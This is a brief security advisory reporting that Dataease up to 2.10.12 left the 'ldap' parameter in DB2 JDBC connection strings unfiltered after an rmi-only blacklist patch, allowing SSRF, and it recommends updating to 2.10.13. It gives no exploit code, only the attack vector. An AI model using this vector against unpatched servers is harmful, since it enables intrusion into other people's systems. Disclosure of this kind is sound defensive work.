Fit2Cloudrd

**Name of the Vulnerable Software and Affected Versions** Dataease versions up to 2.10.12 **Description** Dataease is an open source data analytics and visualization platform. A patch intended to mitigate DB2 JDBC deserialization remote code execution attacks only blacklisted the `rmi` parameter. The `ldap` parameter in the DB2 JDBC connection string was not filtered, allowing attackers to exploit the DB2 JDBC connection string to trigger server-side request forgery (SSRF). While higher versions of Java disable `ldap` deserialization by default, preventing remote code execution, SSRF remains exploitable. **Recommendations** Update to version 2.10.13 or later.